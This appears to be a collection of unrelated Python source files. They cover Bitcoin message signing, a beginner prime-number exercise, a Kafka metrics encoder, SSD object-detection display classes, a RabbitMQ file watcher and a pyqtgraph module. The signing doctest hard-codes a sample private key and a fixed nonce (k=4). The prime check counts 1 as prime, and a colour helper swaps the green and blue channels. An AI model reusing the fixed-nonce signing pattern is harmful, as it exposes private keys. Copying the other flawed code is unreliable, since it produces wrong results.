.bitcoin in order to get the hex private key and whether it is
(or rather, its public key is) compressed.
'iscompressed' is True/False bool for whether or not to indicate
compression on the public key that corresponds to the input
private key hex.
'iscompressed' is not defaulted to True like it is in most other
functions, because it really matters whether you use it. All
software implementations treat uncompressed and compressed keys as
entirely different, and a valid message signature will NOT
validate if the public key compression is not correct. Whereas for
transaction signatures, only the r-value is checked, message
signature validation additionally checks/verifies public key
compression. So you must manually set it!
Also, note that message signatures are an entirely different
format from DER-encoded transaction signatures.
Sample message, which includes the quotation marks, and has a new
line and 4 spaces after the new line:
"You miss 100% of the shots you don't take. -- Wayne Gretzky"
-- Michael Scott
>>> msg = '"You miss 100% of the shots you don\\'t take. -- Wayne Gretzky"\\n -- Michael Scott'
>>> p = 'c05694a7af0e01dceb63e5912a415c28d3fc823ca1fd3fa34d41afde03740466'
>>> k = 4 # chosen by fair dice roll, guaranteed to be random
>>> signmsg(msg,p,True,k)
'H+ST2/HBDYDzWB5JBJMLFATMbBOQDuB1hHT6lKvoxM0TBxoLMWsgrFmA3CGam/poUZPl/PukXCrYBzuwMW3Tyyo='
Your software should then translate that data set into something akin to:
-----BEGIN BITCOIN SIGNED MESSAGE-----
"You miss 100% of the shots you don't take. -- Wayne Gretzky"
-- Michael Scott
-----BEGIN BITCOIN SIGNATURE-----
Address: 1AuZ7wby1rUVzwFvFgySeTFS7JcHN2TeGs
H+ST2/HBDYDzWB5JBJMLFATMbBOQDuB1hHT6lKvoxM0TBxoLMWsgrFmA3CGam/poUZPl/PukXCrYBzuwMW3Tyyo=
-----END BITCOIN SIGNATURE-----
'''
omsg = msg
# Stripping carraige returns is standard practice in every
# implementation I found, including Bitcoin Core
msg = msg.replace("\r\n","\n")
msg1 = hexstrlify(bytearray("\x18Bitcoin Signed Message:\n",'utf-8'))
msg2 = tovarint(len(msg))
msg3 = hexstrlify(bytearray(msg,'utf-8'))
msg = hash256(msg1 + msg2 + msg3)
sig = sign(msg,priv,k)
# Bitcoin message signature format doesn't use DER leading '00's
# Although, r/s must be 64-char, so they are zfilled to that
rlen = 2*int(sig[6:8],16)
r = sig[8:8+(rlen)].lstrip("0").zfill(64)
slen = 2*int(sig[10+(rlen):12+(rlen)],16)
s = sig[12+(rlen):(12+(rlen)+(slen))].lstrip("0").zfill(64)
pubkey = privtopub(priv,iscompressed)
for i in range(4):
prefix = 27 + i
if iscompressed:
prefix = prefix + 4
o = base64.b64encode(unhexlify(dechex(prefix,1) + r + s))
if str(o)[:2] == "b'": # Fuck you, Python 3
o = str(o)[2:-1]
if verifymsg(omsg,o) == pubkey:
return o
raise Exception("Unknown failure. This method should never reach the end.")
def verifymsg(msg,sig):
'''
Compares the message and input signature, and outputs what the
corresponding public key is that would make that message/signature
pair valid.
I didn't set it to take in a pubkey and output True/False because
sometimes it is useful to have the resulting key, even if the
msg/sig pair is invalid.
(And not just in the signmsg() function above.)
Also, worth remembering that message signatures are an entirely
different format than DER-encoded transaction signatures.
>>> msg = '"You miss 100% of the shots you don\\'t take. -- Wayne Gretzky"\\n -- Michael Scott'
>>> sig = 'H+ST2/HBDYDzWB5JBJMLFATMbBOQDuB1hHT6lKvoxM0TBxoLMWsgrFmA3CGam/poUZPl/PukXCrYBzuwMW3Tyyo='
>>> x = verifymsg(msg,sig)
>>> pub = '022587327dabe23ee608d8504d8bc3a341397db1c577370389f94ccd96bb59a077'
>>> x == pub
True
'''
msg = msg.replace("\r\n","\n")
# Again, standard convention to remove returns
msg1 = hexstrlify(bytearray("\x18Bitcoin Signed Message:\n",'utf-8'))
msg2 = tovarint(len(msg))
msg3 = hexstrlify(bytearray(msg,'utf-8'))
msg = hash256(msg1 + msg2 + msg3)
sig = hexstrlify(base64.b64decode(sig))
r = int(sig[2:66],16)
s = int(sig[66:],16)
prefix = int(sig[:2],16)
if prefix > 30:
out_compressed = True
prefix = prefix - 4
else:
out_compressed = False
prefix = prefix - 27
m = int(N*prefix) if prefix > 1 else 0
x = (r + int(m//2)) % N
a = (pow_mod(x, 3, P) + 7) % P
b = pow_mod(a, ((P+1)//4), P)
if (b % 2) != prefix:
y = (-b % P)
else:
y = b
x, y = dechex(x,32), dechex(y,32)
pubkey = "04" + x + y
negative_msg = dechex((N - int(msg,16)),32)
modinv_r = dechex(modinv(r, N),32)
pubkey = multiplypub(
addpubs(
multiplypub(pubkey,dechex(s,32),False),
privtopub(negative_msg,False),False),
modinv_r,False)
if out_compressed:
pubkey = compress(pubkey)
return strlify(pubkey)
def checkmsgsigformat(sig,invalidatehighS=False):
try:
sig = hexstrlify(base64.b64decode(sig))
assert len(sig) == 130
prefix = int(sig[:2],16)
assert prefix > 26 and prefix < 35
if invalidatehighS:
assert int(sig[-64:],16) <= (N / 2)
except AssertionError:
return False
except Exception as e:
raise Exception(str(e))
return True
|
# Esercizio n. 9
# Trovare i numeri primi in una lista di numeri da 1 fino a 20.
lista = [8, 1, 3, 5, 4, 9, 20, 12, 15, 11, 2, 19, 10, 13]
for num in lista:
primo = True
i = 2
while i < num:
if num % i == 0:
primo = False
i = i + 1
if primo:
print("Il numero", num, "è primo")
|
"""Encoder for snap-plugin-publisher-kafka."""
try:
import ujson as json
except ImportError:
import json
import logging
import datetime
import time
try:
# Test for mypy support (requires Python 3)
from typing import List, Text
except:
pass
class Encoder(object):
""".
An encoder for the snap-plugin-publisher-kafka JSON format
See https://github.com/intelsdi-x/snap-plugin-publisher-kafka
Sample measurements:
{
"timestamp":"2017-09-19T14:56:07.863770559Z",
"namespace":"/intel/docker/225c1a3e9f65/stats/filesystem/xvda1/writes_merged",
"data":1.4012927170541047,
"dataRate":null,
"unit":"",
"tags":{
"annotation.io.kubernetes.container.hash":"84aff253",
"annotation.io.kubernetes.container.ports":"[{\"hostPort\":8081,\"containerPort\":8081,\"protocol\":\"TCP\"},{\"hostPort\":4040,\"containerPort\":4040,\"protocol\":\"TCP\"}]",
"annotation.io.kubernetes.container.restartCount":"0",
"annotation.io.kubernetes.container.terminationMessagePath":"/dev/termination-log",
"annotation.io.kubernetes.container.terminationMessagePolicy":"File",
"annotation.io.kubernetes.pod.terminationGracePeriod":"30",
"deploymentId":"",
"io.kubernetes.container.logpath":"/var/log/pods/f5c0b6cb-9d49-11e7-8b0f-0e74cc86d65c/spark-worker2_0.log",
"io.kubernetes.container.name":"spark-worker2",
"io.kubernetes.docker.type":"container",
"io.kubernetes.pod.name":"spark-worker2-3627921749-2dszx",
"io.kubernetes.pod.namespace":"default",
"io.kubernetes.pod.uid":"f5c0b6cb-9d49-11e7-8b0f-0e74cc86d65c",
"io.kubernetes.sandbox.id":"7af02489c3873d150d19259d82641d56daad40cc872ce941e3be785b79f6642f",
"nodename":"ip-10-0-17-95.ec2.internal",
"plugin_running_on":"snap-3490148048-prllg"
},
"version":8,
"last_advertised_time":"2017-09-19T14:56:08.863770559Z"
}
"""
def encode(self, msg):
# type: (bytes) -> List[Text]
measurements = []
for line in msg.decode().split("\n"):
try:
# Set flag for float precision to get the same
# results for Python 2 and 3.
json_object = self.parse_line(line)
except ValueError as e:
logging.debug("Error in encoder: %s", e)
continue
try:
# to set plugin, plugin_instance as the measurement name, just need pass ['plugin', 'plugin_instance']
for ent in json_object:
print ent
measurement = Encoder.format_measurement_name(ent, ['namespace'])
tags = Encoder.format_tags(ent, ['tags'])
value = Encoder.format_value(ent)
time = Encoder.format_time(ent)
measurements.append(Encoder.compose_data(measurement, tags, value, time))
except Exception as e:
print e
logging.debug("Error in input data: %s. Skipping.", e)
continue
return measurements
@staticmethod
def parse_line(line):
# return json.loads(line, {'precise_float': True})
# for influxdb version > 0.9, timestamp is an integer
return json.loads(line)
# following methods are added to support customizing measurement name, tags much more flexible
@staticmethod
def compose_data(measurement, tags, value, time):
data = "{0!s},{1!s} {2!s} {3!s}".format(measurement, tags, value, time)
return data
@staticmethod
def format_measurement_name(entry, args):
name = []
for arg in args:
if arg in entry:
# avoid to add extra _ if some entry value is None
if entry[arg] != '':
name.append(entry[arg])
return '_'.join(name)
@staticmethod
def format_tags(entry, args):
tag = []
for arg in args:
if arg in entry:
# to avoid add None as tag value
if entry[arg] != '':
tag.append("{0!s}={1!s}".format(arg, entry[arg]))
return ','.join(tag)
@staticmethod
def format_time(entry):
d = datetime.datetime.strptime(entry['timestamp'][:-4], "%Y-%m-%dT%H:%M:%S.%f")
return time.mktime(d.timetuple())
@staticmethod
def format_value(entry):
values = entry['data']
return "value={0!s}".format(str(values))
|
"""
第2章SSDで予測結果を画像として描画するクラス
"""
import numpy as np
import matplotlib.pyplot as plt
import cv2 # OpenCVライブラリ
import torch
import time
from utils.dataset import DatasetTransform as DataTransform
import torch.nn as nn
class SSDPredictShow(nn.Module):
"""SSDでの予測と画像の表示をまとめて行うクラス"""
def __init__(self, eval_categories, net, device, TTA=True, image_size=300):
super(SSDPredictShow, self).__init__() # 親クラスのコンストラクタ実行
print(device)
self.eval_categories = eval_categories # クラス名
self.net = net.to(device).eval() # SSDネットワーク
self.device = device
self.TTA=TTA
color_mean = (104, 117, 123) # (BGR)の色の平均値
input_size = image_size # 画像のinputサイズを300×300にする
self.transform = DataTransform(input_size, color_mean) # 前処理クラス
def show(self, image_file_path, data_confidence_level):
"""
物体検出の予測結果を表示をする関数。
Parameters
----------
image_file_path: str
画像のファイルパス
data_confidence_level: float
予測で発見とする確信度の閾値
Returns
-------
なし。rgb_imgに物体検出結果が加わった画像が表示される。
"""
rgb_img, predict_bbox, pre_dict_label_index, scores = self.ssd_predict(
image_file_path, data_confidence_level)
self.vis_bbox(rgb_img, bbox=predict_bbox, label_index=pre_dict_label_index,
scores=scores, label_names=self.eval_categories)
def ssd_predict(self, image_file_path, data_confidence_level=0.5):
"""
SSDで予測させる関数。
Parameters
----------
image_file_path: strt
画像のファイルパス
dataconfidence_level: float
予測で発見とする確信度の閾値
Returns
-------
rgb_img, true_bbox, true_label_index, predict_bbox, pre_dict_label_index, scores
"""
# rgbの画像データを取得
img = cv2.imread(image_file_path) # [高さ][幅][色BGR]
height, width, channels = img.shape # 画像のサイズを取得
rgb_img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
# 画像の前処理
phase = "val"
img_transformed, boxes, labels = self.transform(
img, phase, "", "") # アノテーションが存在しないので""にする。
img = torch.from_numpy(
img_transformed[:, :, (2, 1, 0)]).permute(2, 0, 1).to(self.device)
print(img.size())
# SSDで予測
#self.net.eval() # ネットワークを推論モードへ
x = img.unsqueeze(0) # ミニバッチ化:torch.Size([1, 3, 300, 300])
detections = self.net(x)
# detectionsの形は、torch.Size([1, 21, 200, 5]) ※200はtop_kの値
# confidence_levelが基準以上を取り出す
predict_bbox = []
pre_dict_label_index = []
scores = []
detections = detections.cpu().detach().numpy()
# 条件以上の値を抽出
find_index = np.where(detections[:, 0:, :, 0] >= data_confidence_level)
detections = detections[find_index]
for i in range(len(find_index[1])): # 抽出した物体数分ループを回す
if (find_index[1][i]) > 0: # 背景クラスでないもの
sc = detections[i][0] # 確信度
bbox = detections[i][1:] * [width, height, width, height]
# find_indexはミニバッチ数、クラス、topのtuple
lable_ind = find_index[1][i]-1
# (注釈)
# 背景クラスが0なので1を引く
# 返り値のリストに追加
predict_bbox.append(bbox)
pre_dict_label_index.append(lable_ind)
scores.append(sc)
return rgb_img, predict_bbox, pre_dict_label_index, scores
def ssd_predict2(self, image_file_path, data_confidence_level=0.5):
"""
SSDで予測させる関数。
Parameters
----------
image_file_path: strt
画像のファイルパス
dataconfidence_level: float
予測で発見とする確信度の閾値
Returns
-------
rgb_img, true_bbox, true_label_index, predict_bbox, pre_dict_label_index, scores
"""
# rgbの画像データを取得
img = cv2.imread(image_file_path) # [高さ][幅][色BGR]
height, width, channels = img.shape # 画像のサイズを取得
rgb_img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
# 画像の前処理
phase = "val"
img_transformed, boxes, labels = self.transform(
img, phase, "", "") # アノテーションが存在しないので""にする。
img = torch.from_numpy(
img_transformed[:, :, (2, 1, 0)]).permute(2, 0, 1).to(self.device)
# SSDで予測
#self.net.eval() # ネットワークを推論モードへ
x = img.unsqueeze(0) # ミニバッチ化:torch.Size([1, 3, 300, 300])
with torch.no_grad():
detections = self.net(x)
# detectionsの形は、torch.Size([1, 21, 200, 5]) ※200はtop_kの値
# confidence_levelが基準以上を取り出す
predict_bbox = []
pre_dict_label_index = []
scores = []
try:
detections = detections.cpu().detach().numpy()
except:
detections = detections.detach().numpy()
# 条件以上の値を抽出
find_index = np.where(detections[:, 0:, :, 0] >= data_confidence_level)
detections = detections[find_index]
for i in range(len(find_index[1])): # 抽出した物体数分ループを回す
if (find_index[1][i]) > 0: # 背景クラスでないもの
sc = detections[i][0] # 確信度
detections[i][1:] *= [width, height, width, height]
# find_indexはミニバッチ数、クラス、topのtuple
lable_ind = find_index[1][i]-1
# (注釈)
# 背景クラスが0なので1を引く
# 返り値のリストに追加
#predict_bbox.append(bbox)
pre_dict_label_index.append(lable_ind)
scores.append(sc)
return detections, pre_dict_label_index
def ssd_inference(self, dataloader, all_boxes, data_confidence_level=0.05):
"""
SSDで予測させる関数。
Parameters
----------
image_file_path: strt
画像のファイルパス
dataconfidence_level: float
予測で発見とする確信度の閾値
Returns
-------
rgb_img, true_bbox, true_label_index, predict_bbox, pre_dict_label_index, scores
"""
empty_array = np.transpose(np.array([[],[],[],[],[]]), (1,0))
iii=0 # image number
width = 300
height = 300
for img, _ in dataloader:
num_batch = len(img)
# SSDで予測
self.net.eval().to(self.device) # ネットワークを推論モードへ
tick = time.time()
with torch.no_grad():
x = img.to(self.device) # ミニバッチ化:torch.Size([1, 3, 300, 300])
detections = self.net(x)
tock = time.time()
# detectionsの形は、torch.Size([1, 21, 200, 5]) ※200はtop_kの値
# confidence_levelが基準以上を取り出す
predict_bbox = []
pre_dict_label_index = []
scores = []
detections = detections.cpu().detach().numpy()
print(detections.shape)
# 条件以上の値を抽出
took = time.time()
for batch, detection in enumerate(detections):
for cls in range(21):
box = []
for j,pred in enumerate(detection[cls]):
if pred[0] > data_confidence_level:
pred[1:] *= width
box.append([pred[0],pred[1],pred[2],pred[3],pred[4]])
if not box == []:
all_boxes[cls][iii*num_batch + batch] = box
else:
all_boxes[cls][iii*num_batch + batch] = empty_array
teek = time.time()
#if i%100==0:
print("iter:", iii)
iii += 1
print("sort boxes. detection was {} and post took {} and allboxappend took {}".format(tock-tick, took-tock, teek-took))
return all_boxes
def vis_bbox(self, rgb_img, bbox, label_index, scores, label_names):
"""
物体検出の予測結果を画像で表示させる関数。
Parameters
----------
rgb_img:rgbの画像
対象の画像データ
bbox: list
物体のBBoxのリスト
label_index: list
物体のラベルへのインデックス
scores: list
物体の確信度。
label_names: list
ラベル名の配列
Returns
-------
なし。rgb_imgに物体検出結果が加わった画像が表示される。
"""
# 枠の色の設定
num_classes = len(label_names) # クラス数(背景のぞく)
colors = plt.cm.hsv(np.linspace(0, 1, num_classes)).tolist()
# 画像の表示
plt.figure(figsize=(10, 10))
plt.imshow(rgb_img)
currentAxis = plt.gca()
# BBox分のループ
for i, bb in enumerate(bbox):
# ラベル名
label_name = label_names[label_index[i]]
color = colors[label_index[i]] # クラスごとに別の色の枠を与える
# 枠につけるラベル 例:person;0.72
if scores is not None:
sc = scores[i]
display_txt = '%s: %.2f' % (label_name, sc)
else:
display_txt = '%s: ans' % (label_name)
# 枠の座標
xy = (bb[0], bb[1])
width = bb[2] - bb[0]
height = bb[3] - bb[1]
# 長方形を描画する
currentAxis.add_patch(plt.Rectangle(
xy, width, height, fill=False, edgecolor=color, linewidth=2))
# 長方形の枠の左上にラベルを描画する
currentAxis.text(xy[0], xy[1], display_txt, bbox={
'facecolor': color, 'alpha': 0.5})
from utils.ssd import Detect_Flip
class SSDPredictShowFlip(nn.Module):
"""SSDでの予測と画像の表示をまとめて行うクラス"""
def __init__(self, eval_categories, net, device, TTA=True, softnms=False):
super(SSDPredictShowFlip, self).__init__() # 親クラスのコンストラクタ実行
print(device)
self.eval_categories = eval_categories # クラス名
self.net = net.to(device) # SSDネットワーク
self.device = device
self.TTA =TTA
color_mean = (104, 117, 123) # (BGR)の色の平均値
input_size = 300 # 画像のinputサイズを300×300にする
self.transform = DataTransform(input_size, color_mean) # 前処理クラス
self.Det = Detect_Flip(TTA=TTA, softnms=softnms).to(self.device).eval()
def show(self, image_file_path, data_confidence_level):
"""
物体検出の予測結果を表示をする関数。
Parameters
----------
image_file_path: str
画像のファイルパス
data_confidence_level: float
予測で発見とする確信度の閾値
Returns
-------
なし。rgb_imgに物体検出結果が加わった画像が表示される。
"""
rgb_img, predict_bbox, pre_dict_label_index, scores = self.ssd_predict(
image_file_path, data_confidence_level)
self.vis_bbox(rgb_img, bbox=predict_bbox, label_index=pre_dict_label_index,
scores=scores, label_names=self.eval_categories)
def ssd_predict(self, image_file_path, data_confidence_level=0.5):
"""
SSDで予測させる関数。
Parameters
----------
image_file_path: strt
画像のファイルパス
dataconfidence_level: float
予測で発見とする確信度の閾値
Returns
-------
rgb_img, true_bbox, true_label_index, predict_bbox, pre_dict_label_index, scores
"""
# rgbの画像データを取得
img = cv2.imread(image_file_path) # [高さ][幅][色BGR]
height, width, channels = img.shape # 画像のサイズを取得
rgb_img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
# 画像の前処理
phase = "val"
img_transformed, boxes, labels = self.transform(
img, phase, "", "") # アノテーションが存在しないので""にする。
#print("img shape:", img_transformed.shape)
img = torch.from_numpy(
img_transformed[:, :, (2, 1, 0)]).permute(2, 0, 1).to(self.device)
# SSDで予測
#self.net.eval() # ネットワークを推論モードへ
x = img.unsqueeze(0) # ミニバッチ化:torch.Size([1, 3, 300, 300])
with torch.no_grad():
detections = self.net(x)
# detectionsの形は、torch.Size([1, 21, 200, 5]) ※200はtop_kの値
## Flip inference
x_flip = torch.flip(img, [2])
x_flip = x_flip.unsqueeze(0)
with torch.no_grad():
detections_flip = self.net(x_flip)
#print("check box: ", (detections[2]==detections_flip[2]).sum().numpy())
## Gather detections.
detections_box = self.Det(detections[0], detections[1], detections_flip[0], detections_flip[1], detections[2].to(self.device))
# confidence_levelが基準以上を取り出す
predict_bbox = []
pre_dict_label_index = []
scores = []
detections = detections_box.cpu().detach().numpy()
# 条件以上の値を抽出
find_index = np.where(detections[:, 0:, :, 0] >= data_confidence_level)
detections = detections[find_index]
for i in range(len(find_index[1])): # 抽出した物体数分ループを回す
if (find_index[1][i]) > 0: # 背景クラスでないもの
sc = detections[i][0] # 確信度
bbox = detections[i][1:] * [width, height, width, height]
# find_indexはミニバッチ数、クラス、topのtuple
lable_ind = find_index[1][i]-1
# (注釈)
# 背景クラスが0なので1を引く
# 返り値のリストに追加
predict_bbox.append(bbox)
pre_dict_label_index.append(lable_ind)
scores.append(sc)
return rgb_img, predict_bbox, pre_dict_label_index, scores
def vis_bbox(self, rgb_img, bbox, label_index, scores, label_names):
"""
物体検出の予測結果を画像で表示させる関数。
Parameters
----------
rgb_img:rgbの画像
対象の画像データ
bbox: list
物体のBBoxのリスト
label_index: list
物体のラベルへのインデックス
scores: list
物体の確信度。
label_names: list
ラベル名の配列
Returns
-------
なし。rgb_imgに物体検出結果が加わった画像が表示される。
"""
# 枠の色の設定
num_classes = len(label_names) # クラス数(背景のぞく)
colors = plt.cm.hsv(np.linspace(0, 1, num_classes)).tolist()
# 画像の表示
plt.figure(figsize=(10, 10))
plt.imshow(rgb_img)
currentAxis = plt.gca()
# BBox分のループ
for i, bb in enumerate(bbox):
# ラベル名
label_name = label_names[label_index[i]]
color = colors[label_index[i]] # クラスごとに別の色の枠を与える
# 枠につけるラベル 例:person;0.72
if scores is not None:
sc = scores[i]
display_txt = '%s: %.2f' % (label_name, sc)
else:
display_txt = '%s: ans' % (label_name)
# 枠の座標
xy = (bb[0], bb[1])
width = bb[2] - bb[0]
height = bb[3] - bb[1]
# 長方形を描画する
currentAxis.add_patch(plt.Rectangle(
xy, width, height, fill=False, edgecolor=color, linewidth=2))
# 長方形の枠の左上にラベルを描画する
currentAxis.text(xy[0], xy[1], display_txt, bbox={
'facecolor': color, 'alpha': 0.5})
class SSDPredictShowTest(nn.Module):
"""SSDでの予測と画像の表示をまとめて行うクラス"""
def __init__(self, eval_categories, net, device):
super(SSDPredictShowTest, self).__init__() # 親クラスのコンストラクタ実行
print(device)
self.eval_categories = eval_categories # クラス名
self.net = net.to(device) # SSDネットワーク
self.device = device
color_mean = (104, 117, 123) # (BGR)の色の平均値
input_size = 300 # 画像のinputサイズを300×300にする
self.transform = DataTransform(input_size, color_mean) # 前処理クラス
def show(self, image_file_path, data_confidence_level):
"""
物体検出の予測結果を表示をする関数。
Parameters
----------
image_file_path: str
画像のファイルパス
data_confidence_level: float
予測で発見とする確信度の閾値
Returns
-------
なし。rgb_imgに物体検出結果が加わった画像が表示される。
"""
rgb_img, predict_bbox, pre_dict_label_index, scores = self.ssd_predict(
image_file_path, data_confidence_level)
self.vis_bbox(rgb_img, bbox=predict_bbox, label_index=pre_dict_label_index,
scores=scores, label_names=self.eval_categories)
def ssd_predict(self, image_file_path, data_confidence_level=0.5):
"""
SSDで予測させる関数。
Parameters
----------
image_file_path: strt
画像のファイルパス
dataconfidence_level: float
予測で発見とする確信度の閾値
Returns
-------
rgb_img, true_bbox, true_label_index, predict_bbox, pre_dict_label_index, scores
"""
# rgbの画像データを取得
img = cv2.imread(image_file_path) # [高さ][幅][色BGR]
height, width, channels = img.shape # 画像のサイズを取得
rgb_img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
# 画像の前処理
phase = "val"
img_transformed, boxes, labels = self.transform(
img, phase, "", "") # アノテーションが存在しないので""にする。
img = torch.from_numpy(
img_transformed[:, :, (2, 1, 0)]).permute(2, 0, 1)
# SSDで予測
#self.net.eval() # ネットワークを推論モードへ
x = img.unsqueeze(0).to(self.device) # ミニバッチ化:torch.Size([1, 3, 300, 300])
detections = self.net(x)
# detectionsの形は、torch.Size([1, 21, 200, 5]) ※200はtop_kの値
# confidence_levelが基準以上を取り出す
predict_bbox = []
pre_dict_label_index = []
scores = []
detections = detections.cpu().detach().numpy()
# 条件以上の値を抽出
find_index = np.where(detections[:, 0:, :, 0] >= data_confidence_level)
detections = detections[find_index]
for i in range(len(find_index[1])): # 抽出した物体数分ループを回す
if (find_index[1][i]) > 0: # 背景クラスでないもの
sc = detections[i][0] # 確信度
bbox = detections[i][1:] * [width, height, width, height]
# find_indexはミニバッチ数、クラス、topのtuple
lable_ind = find_index[1][i]-1
# (注釈)
# 背景クラスが0なので1を引く
# 返り値のリストに追加
predict_bbox.append(bbox)
pre_dict_label_index.append(lable_ind)
scores.append(sc)
return rgb_img, predict_bbox, pre_dict_label_index, scores
def vis_bbox(self, rgb_img, bbox, label_index, scores, label_names):
"""
物体検出の予測結果を画像で表示させる関数。
Parameters
----------
rgb_img:rgbの画像
対象の画像データ
bbox: list
物体のBBoxのリスト
label_index: list
物体のラベルへのインデックス
scores: list
物体の確信度。
label_names: list
ラベル名の配列
Returns
-------
なし。rgb_imgに物体検出結果が加わった画像が表示される。
"""
# 枠の色の設定
num_classes = len(label_names) # クラス数(背景のぞく)
colors = plt.cm.hsv(np.linspace(0, 1, num_classes)).tolist()
# 画像の表示
plt.figure(figsize=(10, 10))
plt.imshow(rgb_img)
currentAxis = plt.gca()
# BBox分のループ
for i, bb in enumerate(bbox):
# ラベル名
label_name = label_names[label_index[i]]
color = colors[label_index[i]] # クラスごとに別の色の枠を与える
# 枠につけるラベル 例:person;0.72
if scores is not None:
sc = scores[i]
display_txt = '%s: %.2f' % (label_name, sc)
else:
display_txt = '%s: ans' % (label_name)
# 枠の座標
xy = (bb[0], bb[1])
width = bb[2] - bb[0]
height = bb[3] - bb[1]
# 長方形を描画する
currentAxis.add_patch(plt.Rectangle(
xy, width, height, fill=False, edgecolor=color, linewidth=2))
# 長方形の枠の左上にラベルを描画する
currentAxis.text(xy[0], xy[1], display_txt, bbox={
'facecolor': color, 'alpha': 0.5}) |
import os
import pika
import json
import time
import logging
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler
from inspect import getmembers
from pprint import pprint
from werkzeug.utils import secure_filename
from .lib.video import Video
from .config import endpoints_config
class Watcher:
"""essa classe possui os comportamentos necessários aos eventos de um determinado diretório"""
dir_files_videos_to_cut = os.getcwd() + endpoints_config['dir_txt']
def __init__(self):
self.observer = Observer()
def run(self):
event_handler = Handler()
self.observer.schedule(event_handler, self.dir_files_videos_to_cut, recursive=True)
self.observer.start()
try:
while True:
time.sleep(5)
except:
self.observer.stop()
print ("Ocorreu um erro")
self.observer.join()
class Handler(FileSystemEventHandler):
@staticmethod
def on_any_event(event):
"""se qualquer arquivo for adicionado ou modificado no diretorio escolhido o listenner inicia essa funcao"""
#print(dir(event))
#pprint(getmembers(event))
file_name = os.path.basename(event.src_path)
file_name_video = file_name.replace('.txt', '')
connection = pika.BlockingConnection(pika.ConnectionParameters(host=endpoints_config['rabbit_host']))
channel = connection.channel()
channel.queue_declare(queue=endpoints_config['rabbit_topic'])
file_received = open(event.src_path, "r")
for cut_line in file_received:
cut_information = cut_line.split(';')
cut_data = {
'filename': file_name_video,
'start_time': cut_information[0],
'end_time': cut_information[1],
'title': secure_filename(cut_information[2])
}
message_cut_data = json.dumps(cut_data)
print("Publicando mensagem de corte de video no RabbitMQ")
channel.basic_publish(exchange='', routing_key=endpoints_config['rabbit_topic'], body=message_cut_data)
connection.close()
file_received.close()
def start():
print('Iniciado serviço para enviar os arquivos para fila de corte.')
w = Watcher()
w.run() |
""" TheGraph.py
Last Modified: 5/26/2020
Taha Arshad, Tennessee Bonner, Devin Mensah, Khalid Shaik, Collin Vaille
This file is responsible for implementing all operations related to graphing.
This includes both the trial graph and the real-time voltage "bar graph".
Graphing operations include creating and updating the bar graph and creating, updating,
clearing, pausing/resuming, and annotating (adding arrows to) the trial graph.
This file is also where samples are received from the sampling process.
"""
from pyqtgraph.Qt import QtGui, QtCore
import numpy as np
import pyqtgraph as pg
import TheSession as ts
import timeit
import DisplaySettingsManager as dsm
import JSONConverter
import InputManager as im
import DataAnalysis as da
import TimeCriticalOperations as tco
#Helper methods used later on
def clamp(value, minimum, maximum):
return min(maximum, max(minimum, value))
#Converts the colors
def htmlColorString(qtColor):
return "rgb(" + str(qtColor.red()) + ", " + str(qtColor.blue()) + ", " + str(qtColor.green()) + ")"
#Initializes global variables that need to have default values or references to objects in main window
def initialSetUp(theMainWindow):
global graphInitialized, playing, duringITI, done, mainWindow, graphWindow
graphInitialized = False
playing = False
duringITI = False
done = False
#Save basic references
mainWindow = theMainWindow
graphWindow = theMainWindow.trialGraphWidget
#Add bar graph
createBarGraph()
#Apply settings from DSM and finish bar graph creation
updateGraphSettings()
#Start updating voltage bar according to display rate
#Samples arrive 10 times/sec outside of trials so anything > 10 Hz doesn't matter
voltageBarTimer.start(1000 / dsm.displayRate)
#Sets the graph's play status to parameter (i.e. true = playing, false = paused)
def setPlaying(play):
global playing
playing = play
#During data acquisition...
if im.playMode == im.PlayMode.ACQUISITION:
#Sync time critical process to be in same play state
tco.orderToSetPlaying(play)
#When we press play and the session has not yet started, start it
if play and ts.currentSession and (not ts.currentSession.sessionStarted):
ts.currentSession.sessionStarted = True
createTrialGraph()
#Update global variables and refresh display based on DSM
def updateGraphSettings():
global dataColor, textColor, stimulusColor, axisColor, backgroundColor
global bars
#Define settings
backgroundColor = dsm.colors[dsm.ColorAttribute.BACKGROUND.value]
dataColor = dsm.colors[dsm.ColorAttribute.DATA.value]
textColor = dsm.colors[dsm.ColorAttribute.TEXT.value]
stimulusColor = dsm.colors[dsm.ColorAttribute.STIMULUS.value]
stimulusColor.setAlpha(75) #Give it some transparency since it renders on top of data curve
axisColor = pg.mkPen(color = dsm.colors[dsm.ColorAttribute.AXIS.value], width = 1)
#Apply anti-aliasing setting
pg.setConfigOptions(antialias = dsm.antiAliasing)
#Update bar graph data color
barGraph.clear()
bars = pg.BarGraphItem(x = barXs, height = barHeights, width = 1.0, brush = dataColor)
barGraph.addItem(bars)
#Update other bar graph settings
barGraph.getAxis('left').setPen(axisColor)
barGraph.getAxis('bottom').setPen(backgroundColor) #Hide axis
barGraph.getAxis('top').setPen(backgroundColor) #Hide axis
barGraphWindow.setBackground(backgroundColor)
voltageBarTimer.setInterval(1000 / dsm.displayRate)
#Update trial graph
if graphInitialized:
createTrialGraph(editStatus = False)
#Update no session loaded label
elif not ts.currentSession:
graphWindow.clear()
graphWindow.setBackground(backgroundColor)
graphWindow.addLabel(text = "No Session Loaded",
size = "18pt", color = textColor)
#Called during initialSetUp to create the bar graph once and for all
def createBarGraph():
global barGraphWindow, barGraph, barXs, barHeights
#Create bar graph
barGraphWindow = mainWindow.barGraphWidget
barGraph = barGraphWindow.addPlot()
barGraph.setMaximumWidth(100)
barGraph.setMouseEnabled(x = False, y = False)
barGraph.enableAutoRange('xy', False)
barGraph.setXRange(0, 1)
barGraph.setYRange(0, 5)
barGraph.setLimits(xMin = 0, xMax = 1, yMin = 0, yMax = 5)
barGraph.hideButtons() #Removes auto scale button
barGraph.setMenuEnabled(False) #Removes right click context menu
#Add invisible bottom label so graph's are same height
barGraph.hideAxis('bottom')
barGraph.setLabel('bottom', "<span></span>") #Empty label on bottom
#Add an invisible top axis so graph's are same height
barGraph.getAxis('top').setTicks([[(0, "")]])
barGraph.getAxis('top').setTickFont(im.popUpFont)
barGraph.getAxis('top').setHeight(-5)
barGraph.showAxis('top', True)
#Create arrays of size 1 for both bar x positions and bar heights (both with values initialized to 0)
#These will be added to the bar graph in the correct color in updateGraphSettings
#We can't do it now because we don't know the correct color yet
barXs = np.zeros(1)
barHeights = np.zeros(1)
#Resets the graph (clears display and status; afterwards is ready for new call to createTrialGraph)
